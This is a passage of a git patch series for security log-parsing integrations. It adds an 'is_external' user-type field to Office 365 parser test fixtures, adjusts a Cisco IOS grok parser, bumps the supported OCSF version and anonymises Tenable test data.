365/o365/tests/automated_investigation_and_response_with_additional_fields.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json @@ -95,6 +95,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json index a3a57df24..ca940465a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json @@ -121,6 +121,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, 
diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json index 61b656511..173b1ef9c 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json @@ -108,6 +108,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/browser_log.json b/Office 365/o365/tests/browser_log.json index 611865bee..5bd149008 100644 --- a/Office 365/o365/tests/browser_log.json +++ b/Office 365/o365/tests/browser_log.json @@ -29,6 +29,7 @@ "record_type": 36, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index cc64b69af..661fe2bb6 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -38,6 +38,7 @@ "result_status": "Succeeded", "user_type": { "code": 5, + "is_external": false, "name": "Application" } }, diff --git a/Office 365/o365/tests/compliancemanager-scorechange.json b/Office 365/o365/tests/compliancemanager-scorechange.json index 9e31750bf..cc75e8e2c 100644 --- a/Office 365/o365/tests/compliancemanager-scorechange.json +++ b/Office 365/o365/tests/compliancemanager-scorechange.json @@ -22,6 +22,7 @@ "result_status": "Successful", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/email_reported.json b/Office 365/o365/tests/email_reported.json index e9b064f62..69696b1c5 100644 --- a/Office 365/o365/tests/email_reported.json +++ b/Office 365/o365/tests/email_reported.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, 
diff --git a/Office 365/o365/tests/exchange_event1.json b/Office 365/o365/tests/exchange_event1.json index 881c1f21b..334ec01a8 100644 --- a/Office 365/o365/tests/exchange_event1.json +++ b/Office 365/o365/tests/exchange_event1.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index c15d8da5b..dc81df845 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -30,6 +30,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group.json b/Office 365/o365/tests/exchange_item_group.json index 75fe23b37..2a7d13867 100644 --- a/Office 365/o365/tests/exchange_item_group.json +++ b/Office 365/o365/tests/exchange_item_group.json @@ -40,6 +40,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group_2.json b/Office 365/o365/tests/exchange_item_group_2.json index 1af2cd661..cfbc956e6 100644 --- a/Office 365/o365/tests/exchange_item_group_2.json +++ b/Office 365/o365/tests/exchange_item_group_2.json @@ -93,6 +93,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json index 30682248f..608d46063 100644 --- a/Office 365/o365/tests/exchange_item_update.json +++ b/Office 365/o365/tests/exchange_item_update.json @@ -41,6 +41,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_previewed.json b/Office 365/o365/tests/file_previewed.json index f5cd4e410..d3ce72283 100644 
--- a/Office 365/o365/tests/file_previewed.json +++ b/Office 365/o365/tests/file_previewed.json @@ -42,6 +42,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_size.json b/Office 365/o365/tests/file_size.json index ea0339b0b..7c6c0446f 100644 --- a/Office 365/o365/tests/file_size.json +++ b/Office 365/o365/tests/file_size.json @@ -52,6 +52,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_sync_download_full.json b/Office 365/o365/tests/file_sync_download_full.json index 44dd5f6c3..159b72879 100644 --- a/Office 365/o365/tests/file_sync_download_full.json +++ b/Office 365/o365/tests/file_sync_download_full.json @@ -48,6 +48,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_visited.json b/Office 365/o365/tests/file_visited.json index 46855c741..44ee7180b 100644 --- a/Office 365/o365/tests/file_visited.json +++ b/Office 365/o365/tests/file_visited.json @@ -30,6 +30,7 @@ "result_status": "TRUE", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/form_log.json b/Office 365/o365/tests/form_log.json index 7fc38b1d5..affdbd3b0 100644 --- a/Office 365/o365/tests/form_log.json +++ b/Office 365/o365/tests/form_log.json @@ -28,6 +28,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json index f3609c050..1c31e54e6 100644 --- a/Office 365/o365/tests/inbox_rule.json +++ b/Office 365/o365/tests/inbox_rule.json @@ -46,6 +46,7 @@ "result_status": "True", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/managed_sync.json b/Office 365/o365/tests/managed_sync.json index 4c860c040..9157cdb0a 100644 
--- a/Office 365/o365/tests/managed_sync.json +++ b/Office 365/o365/tests/managed_sync.json @@ -38,6 +38,7 @@ "record_type": 4, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/mass_download.json b/Office 365/o365/tests/mass_download.json index c072a45c4..d099f991b 100644 --- a/Office 365/o365/tests/mass_download.json +++ b/Office 365/o365/tests/mass_download.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/mcas_alert.json b/Office 365/o365/tests/mcas_alert.json index 91e13123f..0e7bbd829 100644 --- a/Office 365/o365/tests/mcas_alert.json +++ b/Office 365/o365/tests/mcas_alert.json @@ -41,6 +41,7 @@ "result_status": "New", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json index e1397f623..cf341ed7d 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json index 31948758b..ef016aff1 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json @@ -114,6 +114,7 @@ "record_type": 28, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json index 59fdd35ce..fd5c01c5f 100644 
--- a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json @@ -21,6 +21,7 @@ "record_type": 41, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json index 790c6b45f..27d256630 100644 --- a/Office 365/o365/tests/operation_properties_01.json +++ b/Office 365/o365/tests/operation_properties_01.json @@ -61,6 +61,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json index 3c91bcb5d..6d50c87eb 100644 --- a/Office 365/o365/tests/operation_properties_02.json +++ b/Office 365/o365/tests/operation_properties_02.json @@ -58,6 +58,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/power_bi.json b/Office 365/o365/tests/power_bi.json index 04a388971..186958235 100644 --- a/Office 365/o365/tests/power_bi.json +++ b/Office 365/o365/tests/power_bi.json @@ -23,6 +23,7 @@ "record_type": 20, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/remove_member_from_role.json b/Office 365/o365/tests/remove_member_from_role.json index 5feefc067..cd39a1c92 100644 --- a/Office 365/o365/tests/remove_member_from_role.json +++ b/Office 365/o365/tests/remove_member_from_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/security_compliance_alert.json b/Office 365/o365/tests/security_compliance_alert.json index 9988fb1fe..f3d73bb7d 100644 --- a/Office 365/o365/tests/security_compliance_alert.json 
+++ b/Office 365/o365/tests/security_compliance_alert.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_2.json b/Office 365/o365/tests/security_compliance_alert_2.json index 43cac929e..b52c6c789 100644 --- a/Office 365/o365/tests/security_compliance_alert_2.json +++ b/Office 365/o365/tests/security_compliance_alert_2.json @@ -65,6 +65,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_3.json b/Office 365/o365/tests/security_compliance_alert_3.json index 4a695584b..693cae46a 100644 --- a/Office 365/o365/tests/security_compliance_alert_3.json +++ b/Office 365/o365/tests/security_compliance_alert_3.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_4.json b/Office 365/o365/tests/security_compliance_alert_4.json index a6b83cc30..33fb22e5d 100644 --- a/Office 365/o365/tests/security_compliance_alert_4.json +++ b/Office 365/o365/tests/security_compliance_alert_4.json @@ -59,6 +59,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_5.json b/Office 365/o365/tests/security_compliance_alert_5.json index f0e153b7e..517d9efea 100644 --- a/Office 365/o365/tests/security_compliance_alert_5.json +++ b/Office 365/o365/tests/security_compliance_alert_5.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json index 0775bbdc8..062affbb5 100644 
--- a/Office 365/o365/tests/security_compliance_alert_7.json +++ b/Office 365/o365/tests/security_compliance_alert_7.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json index 7bb99fa1d..43e51bb06 100644 --- a/Office 365/o365/tests/security_compliance_alert_malicious_url.json +++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json @@ -53,6 +53,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/source_log.json b/Office 365/o365/tests/source_log.json index 95ecbad6c..488df5065 100644 --- a/Office 365/o365/tests/source_log.json +++ b/Office 365/o365/tests/source_log.json @@ -48,6 +48,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json index ec3137b79..f881d49d9 100644 --- a/Office 365/o365/tests/targetusername.json +++ b/Office 365/o365/tests/targetusername.json @@ -58,6 +58,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_message_has_link.json b/Office 365/o365/tests/teams_message_has_link.json index cbb5caa76..03b584a02 100644 --- a/Office 365/o365/tests/teams_message_has_link.json +++ b/Office 365/o365/tests/teams_message_has_link.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users.json b/Office 365/o365/tests/teams_with_foreign_tenant_users.json index 5b1e6802d..83f3436b7 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users.json 
+++ b/Office 365/o365/tests/teams_with_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json index fed58f479..ecbdcb18f 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json index 727b939ce..34e139dff 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_without_foreign_tenant_users.json b/Office 365/o365/tests/teams_without_foreign_tenant_users.json index e22534f43..82ca31d6c 100644 --- a/Office 365/o365/tests/teams_without_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_without_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/threat_intel.json b/Office 365/o365/tests/threat_intel.json index f2bd901be..3b4c44e60 100644 --- a/Office 365/o365/tests/threat_intel.json +++ b/Office 365/o365/tests/threat_intel.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/update_group.json b/Office 365/o365/tests/update_group.json index 20ba82d4d..7bd2bc5a7 100644 --- a/Office 365/o365/tests/update_group.json +++ b/Office 365/o365/tests/update_group.json 
@@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user.json b/Office 365/o365/tests/update_user.json index b8b43939e..268397a3f 100644 --- a/Office 365/o365/tests/update_user.json +++ b/Office 365/o365/tests/update_user.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user_empty_source_ip.json b/Office 365/o365/tests/update_user_empty_source_ip.json index cd658f9a4..22759d202 100644 --- a/Office 365/o365/tests/update_user_empty_source_ip.json +++ b/Office 365/o365/tests/update_user_empty_source_ip.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in.json b/Office 365/o365/tests/user_logged_in.json index 1cb5385fb..f982e5996 100644 --- a/Office 365/o365/tests/user_logged_in.json +++ b/Office 365/o365/tests/user_logged_in.json @@ -44,6 +44,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in_2.json b/Office 365/o365/tests/user_logged_in_2.json index 93fab6554..563567dc8 100644 --- a/Office 365/o365/tests/user_logged_in_2.json +++ b/Office 365/o365/tests/user_logged_in_2.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_login_failed.json b/Office 365/o365/tests/user_login_failed.json index 9156612dc..21fc55744 100644 --- a/Office 365/o365/tests/user_login_failed.json +++ b/Office 365/o365/tests/user_login_failed.json @@ -55,6 +55,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, From da94733e90b0cff1f3acfbbdb727527b1c5059c3 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Fri, 13 Dec 2024 11:19:37 +0100 Subject: [PATCH 146/150] fix(Cisco): remove raise_errors parameter from the root stage --- Cisco/cisco-ios/ingest/parser.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/Cisco/cisco-ios/ingest/parser.yml b/Cisco/cisco-ios/ingest/parser.yml index 634407c14..84cce9666 100644 --- a/Cisco/cisco-ios/ingest/parser.yml +++ b/Cisco/cisco-ios/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false pattern: "(?:%{HOSTNAME:hostname}: )?%{CISCO_HEADER}: %{DATA:description}" custom_patterns: CISCO_HEADER: "%{CISCO_DATESTAMP}: %{MSG_CODE}" From 77327e02e79611455ebccaf0e8b7d63c1e73391e Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 13 Dec 2024 13:06:37 +0200 Subject: [PATCH 147/150] add test --- Office 365/o365/tests/external_user.json | 102 +++++++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 Office 365/o365/tests/external_user.json diff --git a/Office 365/o365/tests/external_user.json b/Office 365/o365/tests/external_user.json new file mode 100644 index 000000000..fd3e6c34f --- /dev/null +++ b/Office 365/o365/tests/external_user.json 
@@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": \"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}" + }, + "expected": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": 
\"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}", + "event": { + "action": "FileDownloaded", + "category": [ + "file" + ], + "code": "6", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-29T12:31:12Z", + "action": { + "id": 6, + "name": "FileDownloaded", + "outcome": "success", + "properties": [ + { + "SiteUrl": "https://example.com/", + "SourceFileName": "1.zip", + "SourceRelativeUrl": "Documents/IMT MBA", + "UserAgent": "OneDriveMpc-Transform_Zip/1.0" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents/IMT MBA", + "extension": "zip", + "name": "1.zip", + "size": 26860827 + }, + "office365": { + "audit": { + "object_id": 
"https://example.com/1.zip" + }, + "context": { + "client": { + "name": "MeTA" + }, + "correlation": { + "id": "27de65c0-1c43-4d70-9a4d-45a66418dbd6" + } + }, + "record_type": 6, + "user_type": { + "code": 0, + "is_external": true, + "name": "Regular" + } + }, + "organization": { + "id": "eda474c4-ddfd-4ecd-85ff-3103a09b118d" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example.com" + ] + }, + "service": { + "name": "OneDrive" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.com", + "full": "https://example.com/1.zip", + "original": "https://example.com/1.zip", + "path": "/1.zip", + "port": 443, + "registered_domain": "example.com", + "scheme": "https", + "top_level_domain": "com" + }, + "user": { + "email": "john.doe@example.com", + "id": "urn:spo:guest:hash#aGVsbG8gdGhlcmUK", + "name": "john.doe@example.com" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "OneDriveMpc-Transform_Zip/1.0", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file From 43aec5548cbf98b36997762a457d179b9c421406 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 13 Dec 2024 16:37:19 +0100 Subject: [PATCH 148/150] chore(OCSF): update the supported version of the specification --- OCSF/ocsf/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index b8f0e2b86..5e5fa828c 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml @@ -7,7 +7,7 @@ slug: ocsf description: >- The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. - Supported version: **1.1** + Supported version: **1.3** data_sources: File monitoring: OCSF allows collecting system activities From f52f5d40805d5a98d82ccaef162872c109e1fea9 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Mon, 16 Dec 2024 12:51:01 +0100 Subject: [PATCH 149/150] Fix client data --- Tenable/alsid/tests/alert_gpo_exec.json | 14 +++++++------- Tenable/alsid/tests/alert_obsolete_system.json | 14 +++++++------- Tenable/alsid/tests/alert_pattern2.json | 12 ++++++------ Tenable/alsid/tests/event_1.json | 16 ++++++++-------- Tenable/alsid/tests/event_2.json | 12 ++++++------ Tenable/alsid/tests/event_3.json | 14 +++++++------- Tenable/alsid/tests/event_4.json | 18 +++++++++--------- Tenable/alsid/tests/ioe_security_alert1.json | 12 ++++++------ Tenable/alsid/tests/ioe_security_alert3.json | 10 +++++----- Tenable/alsid/tests/ioe_security_alert4.json | 8 ++++---- Tenable/alsid/tests/trailflow_alert1.json | 10 +++++----- Tenable/alsid/tests/trailflow_alert2.json | 10 +++++----- Tenable/alsid/tests/trailflow_alert3.json | 12 ++++++------ Tenable/alsid/tests/trailflow_alert4.json | 10 +++++----- 14 files changed, 86 insertions(+), 86 deletions(-) diff --git a/Tenable/alsid/tests/alert_gpo_exec.json b/Tenable/alsid/tests/alert_gpo_exec.json index fd44a4363..f55ff40bf 100644 --- a/Tenable/alsid/tests/alert_gpo_exec.json +++ b/Tenable/alsid/tests/alert_gpo_exec.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-GPO-EXEC-SANITY-UNKNOWN-CSE", "properties": { - "ADdevianceID": 2008125, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2008000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain", + "ADobject": "CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain", "AttributeName": "GpcMachineExtensionName", "CseGuid": "{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}", - "GpoName": "#URDOM-APP-RSAT-TEST", + "GpoName": "#TEST-APP-RSAT-TEST", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "79016668" + "eventID": "790160000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_obsolete_system.json b/Tenable/alsid/tests/alert_obsolete_system.json index 32e1efc05..69c282597 100644 --- a/Tenable/alsid/tests/alert_obsolete_system.json +++ 